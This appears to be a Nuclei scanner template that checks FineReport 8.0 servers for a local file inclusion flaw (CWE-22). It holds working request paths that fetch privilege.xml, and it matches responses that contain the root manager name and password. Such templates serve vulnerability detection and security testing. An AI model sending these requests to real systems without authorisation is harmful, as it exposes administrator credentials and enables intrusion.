id: finereport-path-traversal

info:
  name: FineReport 8.0 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: FIneReport  8.0 is vulnerable to local file inclusion.
  reference:
    - https://web.archive.org/web/20200506020241/http://foreversong.cn/archives/1378
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: finereport,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
      - "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<rootManagerName>"
          - "<rootManagerPassword>"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d8ad3896b38f18318645cc1d1109707ed574ef45ef350c178df8c0fb8cd64869022100bc98ee17d3fcef54f8bf0969333397742e941168de045cb9da6afe6f315eede3:922c64590222798bb761d5b6d8e72950